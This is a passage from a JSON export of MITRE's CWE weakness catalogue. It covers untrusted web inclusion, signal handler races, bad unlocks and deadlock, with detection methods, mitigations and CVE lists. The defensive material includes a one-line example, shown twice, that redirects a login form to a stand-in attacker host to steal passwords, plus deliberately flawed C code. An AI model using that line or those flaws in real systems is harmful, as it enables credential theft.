sensitive application data, or the DOM of a web application.","This might lead to many different consequences depending on the included functionality, but some examples include injection of malware, information exposure by granting excessive privileges or permissions to the untrusted functionality, DOM-based XSS vulnerabilities, stealing user\'s cookies, or open redirect to malware (CWE-601)."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"An attacker could insert malicious functionality into the program by causing the program to download code that the attacker has placed into the untrusted control sphere, such as a malicious web site."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Bytecode Weakness Analysis - including disassembler + source code weakness analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Forced Path Execution","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid."},{"attr":{"@_Mitigation_ID":"MIT-21.1"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":{"xhtml:p":["When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.","For example, ID 1 could map to \\"inbox.txt\\" and ID 2 could map to \\"profile.txt\\". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-34"},"Phase":["Architecture and Design","Operation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server\'s access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.","This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface."]}},{"attr":{"@_Mitigation_ID":"MIT-6"},"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.","Many file inclusion problems occur because the programmer assumed that certain inputs could not be modified, especially for cookies and URL components."]}},{"attr":{"@_Mitigation_ID":"MIT-29"},"Phase":"Operation","Strategy":"Firewall","Description":"Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.","Effectiveness":"Moderate","Effectiveness_Notes":"An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-94"},"Intro_Text":"This login webpage includes a weather widget from an external website:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"HTML"},"xhtml:div":{"#text":"&lt;div class=\\"header\\"&gt; Welcome!&lt;/div&gt;","xhtml:div":{"#text":"&lt;div id=\\"loginBox\\"&gt;Please Login:&lt;/div&gt;&lt;div id=\\"WeatherWidget\\"&gt;&lt;/div&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"&lt;form id =\\"loginForm\\" name=\\"loginForm\\" action=\\"login.php\\" method=\\"post\\"&gt;Username: &lt;input type=\\"text\\" name=\\"username\\" /&gt;&lt;br/&gt;Password: &lt;input type=\\"password\\" name=\\"password\\" /&gt;&lt;input type=\\"submit\\" value=\\"Login\\" /&gt;&lt;/form&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"#text":"&lt;script type=\\"text/javascript\\" src=\\"externalDomain.example.com/weatherwidget.js\\"&gt;&lt;/script&gt;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":{"#text":"document.getElementById(\'loginForm\').action = \\"ATTACK.example.com/stealPassword.php\\";","xhtml:br":["",""],"xhtml:i":"...Weather widget code...."}}],"Body_Text":["This webpage is now only as secure as the external domain it is including functionality from. If an attacker compromised the external domain and could add malicious scripts to the weatherwidget.js file, the attacker would have complete control, as seen in any XSS weakness (CWE-79).","For example, user login information could easily be stolen with a single line added to weatherwidget.js:","This line of javascript changes the login form\'s original action target from the original website to an attack site. As a result, if a user attempts to login their username and password will be sent directly to the attack site."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-2076","Description":"Product does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2076"},{"Reference":"CVE-2004-0285","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0285"},{"Reference":"CVE-2004-0030","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0030"},{"Reference":"CVE-2004-0068","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0068"},{"Reference":"CVE-2005-2157","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2157"},{"Reference":"CVE-2005-2162","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2162"},{"Reference":"CVE-2005-2198","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2198"},{"Reference":"CVE-2004-0128","Description":"Modification of assumed-immutable variable in configuration script leads to file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0128"},{"Reference":"CVE-2005-1864","Description":"PHP file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1864"},{"Reference":"CVE-2005-1869","Description":"PHP file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1869"},{"Reference":"CVE-2005-1870","Description":"PHP file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1870"},{"Reference":"CVE-2005-2154","Description":"PHP local file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2154"},{"Reference":"CVE-2002-1704","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1704"},{"Reference":"CVE-2002-1707","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1707"},{"Reference":"CVE-2005-1964","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1964"},{"Reference":"CVE-2005-1681","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1681"},{"Reference":"CVE-2005-2086","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2086"},{"Reference":"CVE-2004-0127","Description":"Directory traversal vulnerability in PHP include statement.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0127"},{"Reference":"CVE-2005-1971","Description":"Directory traversal vulnerability in PHP include statement.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1971"},{"Reference":"CVE-2005-3335","Description":"PHP file inclusion issue, both remote and local; local include uses \\"..\\" and \\"%00\\" characters as a manipulation, but many remote file inclusion issues probably have this vector.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3335"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"175"}},{"attr":{"@_CAPEC_ID":"201"}},{"attr":{"@_CAPEC_ID":"228"}},{"attr":{"@_CAPEC_ID":"251"}},{"attr":{"@_CAPEC_ID":"252"}},{"attr":{"@_CAPEC_ID":"253"}},{"attr":{"@_CAPEC_ID":"263"}},{"attr":{"@_CAPEC_ID":"549"}},{"attr":{"@_CAPEC_ID":"660"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-76"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-11-29"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"}]}},"830":{"attr":{"@_ID":"830","@_Name":"Inclusion of Web Functionality from an Untrusted Source","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software includes web functionality (such as a web widget) from another domain, which causes it to operate within the domain of the software, potentially granting total access and control of the software to the untrusted source.","Extended_Description":{"xhtml:p":["Including third party functionality in a web-based environment is risky, especially if the source of the functionality is untrusted.","Even if the third party is a trusted source, the software may still be exposed to attacks and malicious behavior if that trusted source is compromised, or if the code is modified in transmission from the third party to the software.","This weakness is common in \\"mashup\\" development on the web, which may include source functionality from other domains. For example, Javascript-based web widgets may be inserted by using \'&lt;SCRIPT SRC=\\"http://other.domain.here\\"&gt;\' tags, which causes the code to run in the domain of the software, not the remote site from which the widget was loaded. As a result, the included code has access to the local DOM, including cookies and other data that the developer might not want the remote site to be able to access.","Such dependencies may be desirable, or even required, but sometimes programmers are not aware that a dependency exists."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"829","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-94"},"Intro_Text":"This login webpage includes a weather widget from an external website:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"HTML"},"xhtml:div":{"#text":"&lt;div class=\\"header\\"&gt; Welcome!&lt;/div&gt;","xhtml:div":{"#text":"&lt;div id=\\"loginBox\\"&gt;Please Login:&lt;/div&gt;&lt;div id=\\"WeatherWidget\\"&gt;&lt;/div&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"&lt;form id =\\"loginForm\\" name=\\"loginForm\\" action=\\"login.php\\" method=\\"post\\"&gt;Username: &lt;input type=\\"text\\" name=\\"username\\" /&gt;&lt;br/&gt;Password: &lt;input type=\\"password\\" name=\\"password\\" /&gt;&lt;input type=\\"submit\\" value=\\"Login\\" /&gt;&lt;/form&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"#text":"&lt;script type=\\"text/javascript\\" src=\\"externalDomain.example.com/weatherwidget.js\\"&gt;&lt;/script&gt;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":{"#text":"document.getElementById(\'loginForm\').action = \\"ATTACK.example.com/stealPassword.php\\";","xhtml:br":["",""],"xhtml:i":"...Weather widget code...."}}],"Body_Text":["This webpage is now only as secure as the external domain it is including functionality from. If an attacker compromised the external domain and could add malicious scripts to the weatherwidget.js file, the attacker would have complete control, as seen in any XSS weakness (CWE-79).","For example, user login information could easily be stolen with a single line added to weatherwidget.js:","This line of javascript changes the login form\'s original action target from the original website to an attack site. As a result, if a user attempts to login their username and password will be sent directly to the attack site."]}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-778"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-12-08"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"831":{"attr":{"@_ID":"831","@_Name":"Signal Handler Function Associated with Multiple Signals","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software defines a function that is used as a handler for more than one signal.","Extended_Description":{"xhtml:p":["While sometimes intentional and safe, when the same function is used to handle multiple signals, a race condition could occur if the function uses any state outside of its local declaration, such as global variables or non-reentrant functions, or has any side effects.","An attacker could send one signal that invokes the handler function; in many OSes, this will typically prevent the same signal from invoking the handler again, at least until the handler function has completed execution. However, the attacker could then send a different signal that is associated with the same handler function. This could interrupt the original handler function while it is still executing. If there is shared state, then the state could be corrupted. This can lead to a variety of potential consequences depending on context, including denial of service and code execution.","Another rarely-explored possibility arises when the signal handler is only designed to be executed once (if at all). By sending multiple signals, an attacker could invoke the function more than once. This may generate extra, unintended side effects. A race condition might not even be necessary; the attacker could send one signal, wait until it is handled, then send the other signal."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"364","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity","Confidentiality","Access Control","Other"],"Impact":["DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands","Read Application Data","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Varies by Context"],"Note":"The most common consequence will be a corruption of the state of the software, possibly leading to a crash or exit. However, if the signal handler is operating on state variables for security relevant libraries or protection mechanisms, the consequences can be far more severe, including protection mechanism bypass, privilege escalation, or information exposure."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This code registers the same signal handler function with two different signals.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void handler (int sigNum) {}int main (int argc, char* argv[]) {}","xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"signal(SIGUSR1, handler)signal(SIGUSR2, handler)","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-26"},"Intro_Text":"This code registers the same signal handler function with two different signals (CWE-831). If those signals are sent to the process, the handler creates a log message (specified in the first argument to the program) and exits.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *logMessage;void handler (int sigNum) {}int main (int argc, char* argv[]) {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"syslog(LOG_NOTICE, \\"%s\\\\n\\", logMessage);free(logMessage);sleep(10);exit(0);","xhtml:br":["","","","",""],"xhtml:i":"/* artificially increase the size of the timing window to make demonstration of this weakness easier. */"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"logMessage = strdup(argv[1]);signal(SIGHUP, handler);signal(SIGTERM, handler);sleep(10);","xhtml:br":["","","","","","",""],"xhtml:i":["/* Register signal handlers. */","/* artificially increase the size of the timing window to make demonstration of this weakness easier. */"]}}]}},"Body_Text":["The handler function uses global state (globalVar and logMessage), and it can be called by both the SIGHUP and SIGTERM signals. An attack scenario might follow these lines:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"The program begins execution, initializes logMessage, and registers the signal handlers for SIGHUP and SIGTERM."},{"xhtml:div":"The program begins its \\"normal\\" functionality, which is simplified as sleep(), but could be any functionality that consumes some time."},{"xhtml:div":"The attacker sends SIGHUP, which invokes handler (call this \\"SIGHUP-handler\\")."},{"xhtml:div":"SIGHUP-handler begins to execute, calling syslog()."},{"xhtml:div":"syslog() calls malloc(), which is non-reentrant. malloc() begins to modify metadata to manage the heap."},{"xhtml:div":"The attacker then sends SIGTERM."},{"xhtml:div":"SIGHUP-handler is interrupted, but syslog\'s malloc call is still executing and has not finished modifying its metadata."},{"xhtml:div":"The SIGTERM handler is invoked."},{"xhtml:div":"SIGTERM-handler records the log message using syslog(), then frees the logMessage variable."}]}},"At this point, the state of the heap is uncertain, because malloc is still modifying the metadata for the heap; the metadata might be in an inconsistent state. The SIGTERM-handler call to free() is assuming that the metadata is inconsistent, possibly causing it to write data to the wrong location while managing the heap. The result is memory corruption, which could lead to a crash or even code execution, depending on the circumstances under which the code is running.","Note that this is an adaptation of a classic example as originally presented by Michal Zalewski [REF-360]; the original example was shown to be exploitable for code execution.","Also note that the strdup(argv[1]) call contains a potential buffer over-read (CWE-126) if the program is called without any arguments, because argc would be 0, and argv[1] would point outside the bounds of the array."]}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-360"}},{"attr":{"@_External_Reference_ID":"REF-361"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-12-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"832":{"attr":{"@_ID":"832","@_Name":"Unlock of a Resource that is not Locked","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software attempts to unlock a resource that is not locked.","Extended_Description":"Depending on the locking functionality, an unlock of a non-locked resource might cause memory corruption or other modification to the resource (or its associated metadata that is used for tracking locks).","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability","Other"],"Impact":["DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands","Modify Memory","Other"],"Note":"Depending on the locking being used, an unlock operation might not have any adverse effects. When effects exist, the most common consequence will be a corruption of the state of the software, possibly leading to a crash or exit; depending on the implementation of the unlocking, memory corruption or code execution could occur."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-4210","Description":"function in OS kernel unlocks a mutex that was not previously locked, causing a panic or overwrite of arbitrary memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4210"},{"Reference":"CVE-2008-4302","Description":"Chain: OS kernel does not properly handle a failure of a function call (CWE-755), leading to an unlock of a resource that was not locked (CWE-832), with resultant crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4302"},{"Reference":"CVE-2009-1243","Description":"OS kernel performs an unlock in some incorrect circumstances, leading to panic.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1243"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-12-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"833":{"attr":{"@_ID":"833","@_Name":"Deadlock","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains multiple threads or executable segments that are waiting for each other to release a necessary lock, resulting in deadlock.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Other)","DoS: Crash, Exit, or Restart"],"Note":"Each thread of execution will \\"hang\\" and prevent tasks from completing. In some cases, CPU consumption may occur if a lock check occurs in a tight loop."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1476","Description":"A bug in some Intel Pentium processors allow DoS (hang) via an invalid \\"CMPXCHG8B\\" instruction, causing a deadlock","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1476"},{"Reference":"CVE-2009-2857","Description":"OS deadlock","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2857"},{"Reference":"CVE-2009-1961","Description":"OS deadlock involving 3 separate functions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1961"},{"Reference":"CVE-2009-2699","Description":"deadlock in 